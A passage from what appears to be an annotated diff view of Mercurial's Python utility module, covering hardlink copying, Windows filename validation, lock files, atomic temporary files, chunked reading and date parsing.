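#   copyfile('.hg/store/data/a.i', 'backup/a.i', hardlink=True)
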
1255 1257 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1256 1258 """Copy a directory tree using hardlinks if possible."""
1257 1259 num = 0
1258 1260
1259 1261 gettopic = lambda: hardlink and _('linking') or _('copying')
1260 1262
1261 1263 if os.path.isdir(src):
1262 1264 if hardlink is None:
1263 1265 hardlink = (os.stat(src).st_dev ==
1264 1266 os.stat(os.path.dirname(dst)).st_dev)
1265 1267 topic = gettopic()
1266 1268 os.mkdir(dst)
1267 1269 for name, kind in listdir(src):
1268 1270 srcname = os.path.join(src, name)
1269 1271 dstname = os.path.join(dst, name)
1270 1272 def nprog(t, pos):
1271 1273 if pos is not None:
1272 1274 return progress(t, pos + num)
1273 1275 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1274 1276 num += n
1275 1277 else:
1276 1278 if hardlink is None:
1277 1279 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1278 1280 os.stat(os.path.dirname(dst)).st_dev)
1279 1281 topic = gettopic()
1280 1282
1281 1283 if hardlink:
1282 1284 try:
1283 1285 oslink(src, dst)
1284 1286 except (IOError, OSError):
1285 1287 hardlink = False
1286 1288 shutil.copy(src, dst)
1287 1289 else:
1288 1290 shutil.copy(src, dst)
1289 1291 num += 1
1290 1292 progress(topic, num)
1291 1293 progress(topic, None)
1292 1294
1293 1295 return hardlink, num
1294 1296
1295 1297 _winreservednames = {
1296 1298 'con', 'prn', 'aux', 'nul',
1297 1299 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1298 1300 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1299 1301 }
1300 1302 _winreservedchars = ':*?"<>|'
1301 1303 def checkwinfilename(path):
1302 1304 r'''Check that the base-relative path is a valid filename on Windows.
1303 1305 Returns None if the path is ok, or a UI string describing the problem.
1304 1306
1305 1307 >>> checkwinfilename(b"just/a/normal/path")
1306 1308 >>> checkwinfilename(b"foo/bar/con.xml")
1307 1309 "filename contains 'con', which is reserved on Windows"
1308 1310 >>> checkwinfilename(b"foo/con.xml/bar")
1309 1311 "filename contains 'con', which is reserved on Windows"
1310 1312 >>> checkwinfilename(b"foo/bar/xml.con")
1311 1313 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1312 1314 "filename contains 'AUX', which is reserved on Windows"
1313 1315 >>> checkwinfilename(b"foo/bar/bla:.txt")
1314 1316 "filename contains ':', which is reserved on Windows"
1315 1317 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1316 1318 "filename contains '\\x07', which is invalid on Windows"
1317 1319 >>> checkwinfilename(b"foo/bar/bla ")
1318 1320 "filename ends with ' ', which is not allowed on Windows"
1319 1321 >>> checkwinfilename(b"../bar")
1320 1322 >>> checkwinfilename(b"foo\\")
1321 1323 "filename ends with '\\', which is invalid on Windows"
1322 1324 >>> checkwinfilename(b"foo\\/bar")
1323 1325 "directory name ends with '\\', which is invalid on Windows"
1324 1326 '''
1325 1327 if path.endswith('\\'):
1326 1328 return _("filename ends with '\\', which is invalid on Windows")
1327 1329 if '\\/' in path:
1328 1330 return _("directory name ends with '\\', which is invalid on Windows")
1329 1331 for n in path.replace('\\', '/').split('/'):
1330 1332 if not n:
1331 1333 continue
1332 1334 for c in _filenamebytestr(n):
1333 1335 if c in _winreservedchars:
1334 1336 return _("filename contains '%s', which is reserved "
1335 1337 "on Windows") % c
1336 1338 if ord(c) <= 31:
1337 1339 return _("filename contains '%s', which is invalid "
1338 1340 "on Windows") % escapestr(c)
1339 1341 base = n.split('.')[0]
1340 1342 if base and base.lower() in _winreservednames:
1341 1343 return _("filename contains '%s', which is reserved "
1342 1344 "on Windows") % base
1343 1345 t = n[-1:]
1344 1346 if t in '. ' and n not in '..':
1345 1347 return _("filename ends with '%s', which is not allowed "
1346 1348 "on Windows") % t
1347 1349
1348 1350 if pycompat.osname == 'nt':
1349 1351 checkosfilename = checkwinfilename
1350 1352 timer = time.clock
1351 1353 else:
1352 1354 checkosfilename = platform.checkosfilename
1353 1355 timer = time.time
1354 1356
1355 1357 if safehasattr(time, "perf_counter"):
1356 1358 timer = time.perf_counter
1357 1359
1358 1360 def makelock(info, pathname):
1359 1361 try:
1360 1362 return os.symlink(info, pathname)
1361 1363 except OSError as why:
1362 1364 if why.errno == errno.EEXIST:
1363 1365 raise
1364 1366 except AttributeError: # no symlink in os
1365 1367 pass
1366 1368
1367 1369 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1368 1370 os.write(ld, info)
1369 1371 os.close(ld)
1370 1372
1371 1373 def readlock(pathname):
1372 1374 try:
1373 1375 return os.readlink(pathname)
1374 1376 except OSError as why:
1375 1377 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1376 1378 raise
1377 1379 except AttributeError: # no symlink in os
1378 1380 pass
1379 1381 fp = posixfile(pathname)
1380 1382 r = fp.read()
1381 1383 fp.close()
1382 1384 return r
1383 1385
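# A minimal sketch of the lock round-trip above (path and contents are
# hypothetical): makelock() prefers a symlink whose target encodes the
# lock info, and readlock() recovers it through either code path:
#
#   makelock('host:1234', '.hg/wlock')
#   assert readlock('.hg/wlock') == 'host:1234'
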
1384 1386 def fstat(fp):
1385 1387 '''stat file object that may not have fileno method.'''
1386 1388 try:
1387 1389 return os.fstat(fp.fileno())
1388 1390 except AttributeError:
1389 1391 return os.stat(fp.name)
1390 1392
1391 1393 # File system features
1392 1394
1393 1395 def fscasesensitive(path):
1394 1396 """
1395 1397 Return true if the given path is on a case-sensitive filesystem
1396 1398
1397 1399 Requires a path (like /foo/.hg) ending with a foldable final
1398 1400 directory component.
1399 1401 """
1400 1402 s1 = os.lstat(path)
1401 1403 d, b = os.path.split(path)
1402 1404 b2 = b.upper()
1403 1405 if b == b2:
1404 1406 b2 = b.lower()
1405 1407 if b == b2:
1406 1408 return True # no evidence against case sensitivity
1407 1409 p2 = os.path.join(d, b2)
1408 1410 try:
1409 1411 s2 = os.lstat(p2)
1410 1412 if s2 == s1:
1411 1413 return False
1412 1414 return True
1413 1415 except OSError:
1414 1416 return True
1415 1417
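# For example (illustrative; the result depends on the actual mount):
#
#   fscasesensitive('/path/to/repo/.hg')  # typically False on HFS+, True on ext4
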
1416 1418 try:
1417 1419 import re2
1418 1420 _re2 = None
1419 1421 except ImportError:
1420 1422 _re2 = False
1421 1423
1422 1424 class _re(object):
1423 1425 def _checkre2(self):
1424 1426 global _re2
1425 1427 try:
1426 1428 # check if match works, see issue3964
1427 1429 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1428 1430 except ImportError:
1429 1431 _re2 = False
1430 1432
1431 1433 def compile(self, pat, flags=0):
1432 1434 '''Compile a regular expression, using re2 if possible
1433 1435
1434 1436 For best performance, use only re2-compatible regexp features. The
1435 1437 only flags from the re module that are re2-compatible are
1436 1438 IGNORECASE and MULTILINE.'''
1437 1439 if _re2 is None:
1438 1440 self._checkre2()
1439 1441 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1440 1442 if flags & remod.IGNORECASE:
1441 1443 pat = '(?i)' + pat
1442 1444 if flags & remod.MULTILINE:
1443 1445 pat = '(?m)' + pat
1444 1446 try:
1445 1447 return re2.compile(pat)
1446 1448 except re2.error:
1447 1449 pass
1448 1450 return remod.compile(pat, flags)
1449 1451
1450 1452 @propertycache
1451 1453 def escape(self):
1452 1454 '''Return the version of escape corresponding to self.compile.
1453 1455
1454 1456 This is imperfect because whether re2 or re is used for a particular
1455 1457 function depends on the flags, etc, but it's the best we can do.
1456 1458 '''
1457 1459 global _re2
1458 1460 if _re2 is None:
1459 1461 self._checkre2()
1460 1462 if _re2:
1461 1463 return re2.escape
1462 1464 else:
1463 1465 return remod.escape
1464 1466
1465 1467 re = _re()
1466 1468
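# Illustrative: both calls below yield usable compiled patterns; re2 is
# used only when it imports, works, and the flags are supported:
#
#   pat1 = re.compile(br'^[a-f0-9]{40}$')      # re2 when available
#   pat2 = re.compile(br'foo.', remod.DOTALL)  # unsupported flag: uses remod
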
1467 1469 _fspathcache = {}
1468 1470 def fspath(name, root):
1469 1471 '''Get name in the case stored in the filesystem
1470 1472
1471 1473 The name should be relative to root, and be normcase-ed for efficiency.
1472 1474
1473 1475 Note that this function is unnecessary, and should not be
1474 1476 called, for case-sensitive filesystems (simply because it's expensive).
1475 1477
1476 1478 The root should be normcase-ed, too.
1477 1479 '''
1478 1480 def _makefspathcacheentry(dir):
1479 1481 return dict((normcase(n), n) for n in os.listdir(dir))
1480 1482
1481 1483 seps = pycompat.ossep
1482 1484 if pycompat.osaltsep:
1483 1485 seps = seps + pycompat.osaltsep
1484 1486 # Protect backslashes. This gets silly very quickly.
1485 1487 seps = seps.replace('\\', '\\\\')
1486 1488 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1487 1489 dir = os.path.normpath(root)
1488 1490 result = []
1489 1491 for part, sep in pattern.findall(name):
1490 1492 if sep:
1491 1493 result.append(sep)
1492 1494 continue
1493 1495
1494 1496 if dir not in _fspathcache:
1495 1497 _fspathcache[dir] = _makefspathcacheentry(dir)
1496 1498 contents = _fspathcache[dir]
1497 1499
1498 1500 found = contents.get(part)
1499 1501 if not found:
1500 1502 # retry "once per directory" per "dirstate.walk" which
1501 1503 # may take place for each patch of "hg qpush", for example
1502 1504 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1503 1505 found = contents.get(part)
1504 1506
1505 1507 result.append(found or part)
1506 1508 dir = os.path.join(dir, part)
1507 1509
1508 1510 return ''.join(result)
1509 1511
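# Illustrative: with an on-disk entry 'Foo/Bar.txt' under a hypothetical
# root, a normcased query recovers the stored spelling:
#
#   fspath('foo/bar.txt', '/repo')  # 'Foo/Bar.txt'
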
1510 1512 def getfstype(dirpath):
1511 1513 '''Get the filesystem type name from a directory (best-effort)
1512 1514
1513 1515 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1514 1516 '''
1515 1517 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1516 1518
1517 1519 def checknlink(testfile):
1518 1520 '''check whether hardlink count reporting works properly'''
1519 1521
1520 1522 # testfile may be open, so we need a separate file for checking to
1521 1523 # work around issue2543 (or testfile may get lost on Samba shares)
1522 1524 f1, f2, fp = None, None, None
1523 1525 try:
1524 1526 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1525 1527 suffix='1~', dir=os.path.dirname(testfile))
1526 1528 os.close(fd)
1527 1529 f2 = '%s2~' % f1[:-2]
1528 1530
1529 1531 oslink(f1, f2)
1530 1532 # nlinks() may behave differently for files on Windows shares if
1531 1533 # the file is open.
1532 1534 fp = posixfile(f2)
1533 1535 return nlinks(f2) > 1
1534 1536 except OSError:
1535 1537 return False
1536 1538 finally:
1537 1539 if fp is not None:
1538 1540 fp.close()
1539 1541 for f in (f1, f2):
1540 1542 try:
1541 1543 if f is not None:
1542 1544 os.unlink(f)
1543 1545 except OSError:
1544 1546 pass
1545 1547
1546 1548 def endswithsep(path):
1547 1549 '''Check path ends with os.sep or os.altsep.'''
1548 1550 return (path.endswith(pycompat.ossep)
1549 1551 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1550 1552
1551 1553 def splitpath(path):
1552 1554 '''Split path by os.sep.
1553 1555 Note that this function does not use os.altsep because it is
1554 1556 meant as a simple alternative to "xxx.split(os.sep)".
1555 1557 It is recommended to use os.path.normpath() before using this
1556 1558 function if needed.'''
1557 1559 return path.split(pycompat.ossep)
1558 1560
1559 1561 def gui():
1560 1562 '''Are we running in a GUI?'''
1561 1563 if pycompat.sysplatform == 'darwin':
1562 1564 if 'SSH_CONNECTION' in encoding.environ:
1563 1565 # handle SSH access to a box where the user is logged in
1564 1566 return False
1565 1567 elif getattr(osutil, 'isgui', None):
1566 1568 # check if a CoreGraphics session is available
1567 1569 return osutil.isgui()
1568 1570 else:
1569 1571 # pure build; use a safe default
1570 1572 return True
1571 1573 else:
1572 1574 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1573 1575
1574 1576 def mktempcopy(name, emptyok=False, createmode=None):
1575 1577 """Create a temporary file with the same contents from name
1576 1578
1577 1579 The permission bits are copied from the original file.
1578 1580
1579 1581 If the temporary file is going to be truncated immediately, you
1580 1582 can use emptyok=True as an optimization.
1581 1583
1582 1584 Returns the name of the temporary file.
1583 1585 """
1584 1586 d, fn = os.path.split(name)
1585 1587 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1586 1588 os.close(fd)
1587 1589 # Temporary files are created with mode 0600, which is usually not
1588 1590 # what we want. If the original file already exists, just copy
1589 1591 # its mode. Otherwise, manually obey umask.
1590 1592 copymode(name, temp, createmode)
1591 1593 if emptyok:
1592 1594 return temp
1593 1595 try:
1594 1596 try:
1595 1597 ifp = posixfile(name, "rb")
1596 1598 except IOError as inst:
1597 1599 if inst.errno == errno.ENOENT:
1598 1600 return temp
1599 1601 if not getattr(inst, 'filename', None):
1600 1602 inst.filename = name
1601 1603 raise
1602 1604 ofp = posixfile(temp, "wb")
1603 1605 for chunk in filechunkiter(ifp):
1604 1606 ofp.write(chunk)
1605 1607 ifp.close()
1606 1608 ofp.close()
1607 1609 except: # re-raises
1608 1610 try:
1609 1611 os.unlink(temp)
1610 1612 except OSError:
1611 1613 pass
1612 1614 raise
1613 1615 return temp
1614 1616
1615 1617 class filestat(object):
1616 1618 """help to exactly detect change of a file
1617 1619
1618 1620 'stat' attribute is the result of 'os.stat()' if the specified
1619 1621 'path' exists. Otherwise, it is None. This avoids a preparatory
1620 1622 'exists()' check on the client side of this class.
1621 1623 """
1622 1624 def __init__(self, stat):
1623 1625 self.stat = stat
1624 1626
1625 1627 @classmethod
1626 1628 def frompath(cls, path):
1627 1629 try:
1628 1630 stat = os.stat(path)
1629 1631 except OSError as err:
1630 1632 if err.errno != errno.ENOENT:
1631 1633 raise
1632 1634 stat = None
1633 1635 return cls(stat)
1634 1636
1635 1637 @classmethod
1636 1638 def fromfp(cls, fp):
1637 1639 stat = os.fstat(fp.fileno())
1638 1640 return cls(stat)
1639 1641
1640 1642 __hash__ = object.__hash__
1641 1643
1642 1644 def __eq__(self, old):
1643 1645 try:
1644 1646 # if ambiguity between stat of new and old file is
1645 1647 # avoided, comparison of size, ctime and mtime is enough
1646 1648 # to exactly detect change of a file regardless of platform
1647 1649 return (self.stat.st_size == old.stat.st_size and
1648 1650 self.stat.st_ctime == old.stat.st_ctime and
1649 1651 self.stat.st_mtime == old.stat.st_mtime)
1650 1652 except AttributeError:
1651 1653 pass
1652 1654 try:
1653 1655 return self.stat is None and old.stat is None
1654 1656 except AttributeError:
1655 1657 return False
1656 1658
1657 1659 def isambig(self, old):
1658 1660 """Examine whether new (= self) stat is ambiguous against old one
1659 1661
1660 1662 "S[N]" below means stat of a file at N-th change:
1661 1663
1662 1664 - S[n-1].ctime < S[n].ctime: can detect change of a file
1663 1665 - S[n-1].ctime == S[n].ctime
1664 1666 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1665 1667 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1666 1668 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1667 1669 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1668 1670
1669 1671 Case (*2) above means that a file was changed twice or more
1670 1672 within the same second (= S[n-1].ctime), so comparison of
1671 1673 timestamps is ambiguous.
1672 1674
1673 1675 The basic idea to avoid such ambiguity is "advance mtime 1 sec,
1674 1676 if the timestamp is ambiguous".
1675 1677
1676 1678 But advancing mtime only in case (*2) doesn't work as
1677 1679 expected, because naturally advanced S[n].mtime in case (*1)
1678 1680 might be equal to manually advanced S[n-1 or earlier].mtime.
1679 1681
1680 1682 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1681 1683 treated as ambiguous regardless of mtime, to avoid overlooking
1682 1684 changes because of collisions between such mtimes.
1683 1685
1684 1686 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1685 1687 S[n].mtime", even if size of a file isn't changed.
1686 1688 """
1687 1689 try:
1688 1690 return (self.stat.st_ctime == old.stat.st_ctime)
1689 1691 except AttributeError:
1690 1692 return False
1691 1693
1692 1694 def avoidambig(self, path, old):
1693 1695 """Change file stat of specified path to avoid ambiguity
1694 1696
1695 1697 'old' should be previous filestat of 'path'.
1696 1698
1697 1699 Avoiding ambiguity is skipped if the process doesn't have
1698 1700 appropriate privileges for 'path'; False is returned in that
1699 1701 case.
1700 1702
1701 1703 Otherwise, this returns True, as "ambiguity is avoided".
1702 1704 """
1703 1705 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1704 1706 try:
1705 1707 os.utime(path, (advanced, advanced))
1706 1708 except OSError as inst:
1707 1709 if inst.errno == errno.EPERM:
1708 1710 # utime() on the file created by another user causes EPERM,
1709 1711 # if a process doesn't have appropriate privileges
1710 1712 return False
1711 1713 raise
1712 1714 return True
1713 1715
1714 1716 def __ne__(self, other):
1715 1717 return not self == other
1716 1718
1717 1719 class atomictempfile(object):
1718 1720 '''writable file object that atomically updates a file
1719 1721
1720 1722 All writes will go to a temporary copy of the original file. Call
1721 1723 close() when you are done writing, and atomictempfile will rename
1722 1724 the temporary copy to the original name, making the changes
1723 1725 visible. If the object is destroyed without being closed, all your
1724 1726 writes are discarded.
1725 1727
1726 1728 checkambig argument of constructor is used with filestat, and is
1727 1729 useful only if target file is guarded by any lock (e.g. repo.lock
1728 1730 or repo.wlock).
1729 1731 '''
1730 1732 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1731 1733 self.__name = name # permanent name
1732 1734 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1733 1735 createmode=createmode)
1734 1736 self._fp = posixfile(self._tempname, mode)
1735 1737 self._checkambig = checkambig
1736 1738
1737 1739 # delegated methods
1738 1740 self.read = self._fp.read
1739 1741 self.write = self._fp.write
1740 1742 self.seek = self._fp.seek
1741 1743 self.tell = self._fp.tell
1742 1744 self.fileno = self._fp.fileno
1743 1745
1744 1746 def close(self):
1745 1747 if not self._fp.closed:
1746 1748 self._fp.close()
1747 1749 filename = localpath(self.__name)
1748 1750 oldstat = self._checkambig and filestat.frompath(filename)
1749 1751 if oldstat and oldstat.stat:
1750 1752 rename(self._tempname, filename)
1751 1753 newstat = filestat.frompath(filename)
1752 1754 if newstat.isambig(oldstat):
1753 1755 # stat of changed file is ambiguous to original one
1754 1756 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1755 1757 os.utime(filename, (advanced, advanced))
1756 1758 else:
1757 1759 rename(self._tempname, filename)
1758 1760
1759 1761 def discard(self):
1760 1762 if not self._fp.closed:
1761 1763 try:
1762 1764 os.unlink(self._tempname)
1763 1765 except OSError:
1764 1766 pass
1765 1767 self._fp.close()
1766 1768
1767 1769 def __del__(self):
1768 1770 if safehasattr(self, '_fp'): # constructor actually did something
1769 1771 self.discard()
1770 1772
1771 1773 def __enter__(self):
1772 1774 return self
1773 1775
1774 1776 def __exit__(self, exctype, excvalue, traceback):
1775 1777 if exctype is not None:
1776 1778 self.discard()
1777 1779 else:
1778 1780 self.close()
1779 1781
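# Typical use (the path is hypothetical): writes go to a temporary copy
# and replace the target only when the block exits cleanly:
#
#   with atomictempfile('.hg/requires') as fp:
#       fp.write('revlogv1\n')
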
1780 1782 def unlinkpath(f, ignoremissing=False):
1781 1783 """unlink and remove the directory if it is empty"""
1782 1784 if ignoremissing:
1783 1785 tryunlink(f)
1784 1786 else:
1785 1787 unlink(f)
1786 1788 # try removing directories that might now be empty
1787 1789 try:
1788 1790 removedirs(os.path.dirname(f))
1789 1791 except OSError:
1790 1792 pass
1791 1793
1792 1794 def tryunlink(f):
1793 1795 """Attempt to remove a file, ignoring ENOENT errors."""
1794 1796 try:
1795 1797 unlink(f)
1796 1798 except OSError as e:
1797 1799 if e.errno != errno.ENOENT:
1798 1800 raise
1799 1801
1800 1802 def makedirs(name, mode=None, notindexed=False):
1801 1803 """recursive directory creation with parent mode inheritance
1802 1804
1803 1805 Newly created directories are marked as "not to be indexed by
1804 1806 the content indexing service", if ``notindexed`` is specified
1805 1807 for "write" mode access.
1806 1808 """
1807 1809 try:
1808 1810 makedir(name, notindexed)
1809 1811 except OSError as err:
1810 1812 if err.errno == errno.EEXIST:
1811 1813 return
1812 1814 if err.errno != errno.ENOENT or not name:
1813 1815 raise
1814 1816 parent = os.path.dirname(os.path.abspath(name))
1815 1817 if parent == name:
1816 1818 raise
1817 1819 makedirs(parent, mode, notindexed)
1818 1820 try:
1819 1821 makedir(name, notindexed)
1820 1822 except OSError as err:
1821 1823 # Catch EEXIST to handle races
1822 1824 if err.errno == errno.EEXIST:
1823 1825 return
1824 1826 raise
1825 1827 if mode is not None:
1826 1828 os.chmod(name, mode)
1827 1829
1828 1830 def readfile(path):
1829 1831 with open(path, 'rb') as fp:
1830 1832 return fp.read()
1831 1833
1832 1834 def writefile(path, text):
1833 1835 with open(path, 'wb') as fp:
1834 1836 fp.write(text)
1835 1837
1836 1838 def appendfile(path, text):
1837 1839 with open(path, 'ab') as fp:
1838 1840 fp.write(text)
1839 1841
1840 1842 class chunkbuffer(object):
1841 1843 """Allow arbitrary sized chunks of data to be efficiently read from an
1842 1844 iterator over chunks of arbitrary size."""
1843 1845
1844 1846 def __init__(self, in_iter):
1845 1847 """in_iter is the iterator that's iterating over the input chunks."""
1846 1848 def splitbig(chunks):
1847 1849 for chunk in chunks:
1848 1850 if len(chunk) > 2**20:
1849 1851 pos = 0
1850 1852 while pos < len(chunk):
1851 1853 end = pos + 2 ** 18
1852 1854 yield chunk[pos:end]
1853 1855 pos = end
1854 1856 else:
1855 1857 yield chunk
1856 1858 self.iter = splitbig(in_iter)
1857 1859 self._queue = collections.deque()
1858 1860 self._chunkoffset = 0
1859 1861
1860 1862 def read(self, l=None):
1861 1863 """Read L bytes of data from the iterator of chunks of data.
1862 1864 Returns less than L bytes if the iterator runs dry.
1863 1865
1864 1866 If size parameter is omitted, read everything"""
1865 1867 if l is None:
1866 1868 return ''.join(self.iter)
1867 1869
1868 1870 left = l
1869 1871 buf = []
1870 1872 queue = self._queue
1871 1873 while left > 0:
1872 1874 # refill the queue
1873 1875 if not queue:
1874 1876 target = 2**18
1875 1877 for chunk in self.iter:
1876 1878 queue.append(chunk)
1877 1879 target -= len(chunk)
1878 1880 if target <= 0:
1879 1881 break
1880 1882 if not queue:
1881 1883 break
1882 1884
1883 1885 # The easy way to do this would be to queue.popleft(), modify the
1884 1886 # chunk (if necessary), then queue.appendleft(). However, for cases
1885 1887 # where we read partial chunk content, this incurs 2 dequeue
1886 1888 # mutations and creates a new str for the remaining chunk in the
1887 1889 # queue. Our code below avoids this overhead.
1888 1890
1889 1891 chunk = queue[0]
1890 1892 chunkl = len(chunk)
1891 1893 offset = self._chunkoffset
1892 1894
1893 1895 # Use full chunk.
1894 1896 if offset == 0 and left >= chunkl:
1895 1897 left -= chunkl
1896 1898 queue.popleft()
1897 1899 buf.append(chunk)
1898 1900 # self._chunkoffset remains at 0.
1899 1901 continue
1900 1902
1901 1903 chunkremaining = chunkl - offset
1902 1904
1903 1905 # Use all of unconsumed part of chunk.
1904 1906 if left >= chunkremaining:
1905 1907 left -= chunkremaining
1906 1908 queue.popleft()
1907 1909 # offset == 0 is enabled by block above, so this won't merely
1908 1910 # copy via ``chunk[0:]``.
1909 1911 buf.append(chunk[offset:])
1910 1912 self._chunkoffset = 0
1911 1913
1912 1914 # Partial chunk needed.
1913 1915 else:
1914 1916 buf.append(chunk[offset:offset + left])
1915 1917 self._chunkoffset += left
1916 1918 left -= chunkremaining
1917 1919
1918 1920 return ''.join(buf)
1919 1921
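# A small illustration of the rechunking above (values worked through the
# code by hand):
#
#   cb = chunkbuffer(iter(['abc', 'defg']))
#   cb.read(2)   # 'ab'   (partial first chunk; offset bookkeeping applies)
#   cb.read(4)   # 'cdef' (drains the first chunk, then part of the second)
#   cb.read(5)   # 'g'    (returns less once the iterator runs dry)
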
1920 1922 def filechunkiter(f, size=131072, limit=None):
1921 1923 """Create a generator that produces the data in the file size
1922 1924 (default 131072) bytes at a time, up to optional limit (default is
1923 1925 to read all data). Chunks may be less than size bytes if the
1924 1926 chunk is the last chunk in the file, or the file is a socket or
1925 1927 some other type of file that sometimes reads less data than is
1926 1928 requested."""
1927 1929 assert size >= 0
1928 1930 assert limit is None or limit >= 0
1929 1931 while True:
1930 1932 if limit is None:
1931 1933 nbytes = size
1932 1934 else:
1933 1935 nbytes = min(limit, size)
1934 1936 s = nbytes and f.read(nbytes)
1935 1937 if not s:
1936 1938 break
1937 1939 if limit:
1938 1940 limit -= len(s)
1939 1941 yield s
1940 1942
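# Illustrative use, bounding how much of a (hypothetical) file object is
# consumed:
#
#   fp = posixfile('big.bin', 'rb')
#   for chunk in filechunkiter(fp, size=65536, limit=1 << 20):
#       process(chunk)  # 'process' is a stand-in, not defined here
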
1941 1943 def makedate(timestamp=None):
1942 1944 '''Return a unix timestamp (or the current time) as a (unixtime,
1943 1945 offset) tuple based on the local timezone.'''
1944 1946 if timestamp is None:
1945 1947 timestamp = time.time()
1946 1948 if timestamp < 0:
1947 1949 hint = _("check your clock")
1948 1950 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1949 1951 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1950 1952 datetime.datetime.fromtimestamp(timestamp))
1951 1953 tz = delta.days * 86400 + delta.seconds
1952 1954 return timestamp, tz
1953 1955
1954 1956 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1955 1957 """represent a (unixtime, offset) tuple as a localized time.
1956 1958 unixtime is seconds since the epoch, and offset is the time zone's
1957 1959 number of seconds away from UTC.
1958 1960
1959 1961 >>> datestr((0, 0))
1960 1962 'Thu Jan 01 00:00:00 1970 +0000'
1961 1963 >>> datestr((42, 0))
1962 1964 'Thu Jan 01 00:00:42 1970 +0000'
1963 1965 >>> datestr((-42, 0))
1964 1966 'Wed Dec 31 23:59:18 1969 +0000'
1965 1967 >>> datestr((0x7fffffff, 0))
1966 1968 'Tue Jan 19 03:14:07 2038 +0000'
1967 1969 >>> datestr((-0x80000000, 0))
1968 1970 'Fri Dec 13 20:45:52 1901 +0000'
1969 1971 """
1970 1972 t, tz = date or makedate()
1971 1973 if "%1" in format or "%2" in format or "%z" in format:
1972 1974 sign = (tz > 0) and "-" or "+"
1973 1975 minutes = abs(tz) // 60
1974 1976 q, r = divmod(minutes, 60)
1975 1977 format = format.replace("%z", "%1%2")
1976 1978 format = format.replace("%1", "%c%02d" % (sign, q))
1977 1979 format = format.replace("%2", "%02d" % r)
1978 1980 d = t - tz
1979 1981 if d > 0x7fffffff:
1980 1982 d = 0x7fffffff
1981 1983 elif d < -0x80000000:
1982 1984 d = -0x80000000
1983 1985 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1984 1986 # because they use the gmtime() system call which is buggy on Windows
1985 1987 # for negative values.
1986 1988 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1987 1989 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1988 1990 return s
1989 1991
1990 1992 def shortdate(date=None):
1991 1993 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1992 1994 return datestr(date, format='%Y-%m-%d')
1993 1995
1994 1996 def parsetimezone(s):
1995 1997 """find a trailing timezone, if any, in string, and return a
1996 1998 (offset, remainder) pair"""
1997 1999
1998 2000 if s.endswith("GMT") or s.endswith("UTC"):
1999 2001 return 0, s[:-3].rstrip()
2000 2002
2001 2003 # Unix-style timezones [+-]hhmm
2002 2004 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2003 2005 sign = (s[-5] == "+") and 1 or -1
2004 2006 hours = int(s[-4:-2])
2005 2007 minutes = int(s[-2:])
2006 2008 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2007 2009
2008 2010 # ISO8601 trailing Z
2009 2011 if s.endswith("Z") and s[-2:-1].isdigit():
2010 2012 return 0, s[:-1]
2011 2013
2012 2014 # ISO8601-style [+-]hh:mm
2013 2015 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2014 2016 s[-5:-3].isdigit() and s[-2:].isdigit()):
2015 2017 sign = (s[-6] == "+") and 1 or -1
2016 2018 hours = int(s[-5:-3])
2017 2019 minutes = int(s[-2:])
2018 2020 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2019 2021
2020 2022 return None, s
2021 2023
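# For instance (note the sign convention: the returned offset is the
# number of seconds to add to local time to obtain UTC):
#
#   parsetimezone('Mon Jan 02 15:04:05 2006 -0500')
#   # (18000, 'Mon Jan 02 15:04:05 2006')
#   parsetimezone('2006-01-02T15:04Z')
#   # (0, '2006-01-02T15:04')
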
2022 2024 def strdate(string, format, defaults=None):
2023 2025 """parse a localized time string and return a (unixtime, offset) tuple.
2024 2026 if the string cannot be parsed, ValueError is raised."""
2025 2027 if defaults is None:
2026 2028 defaults = {}
2027 2029
2028 2030 # NOTE: unixtime = localunixtime + offset
2029 2031 offset, date = parsetimezone(string)
2030 2032
2031 2033 # add missing elements from defaults
2032 2034 usenow = False # default to using biased defaults
2033 2035 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2034 2036 part = pycompat.bytestr(part)
2035 2037 found = [True for p in part if ("%"+p) in format]
2036 2038 if not found:
2037 2039 date += "@" + defaults[part][usenow]
2038 2040 format += "@%" + part[0]
2039 2041 else:
2040 2042 # We've found a specific time element, less specific time
2041 2043 # elements are relative to today
2042 2044 usenow = True
2043 2045
2044 2046 timetuple = time.strptime(encoding.strfromlocal(date),
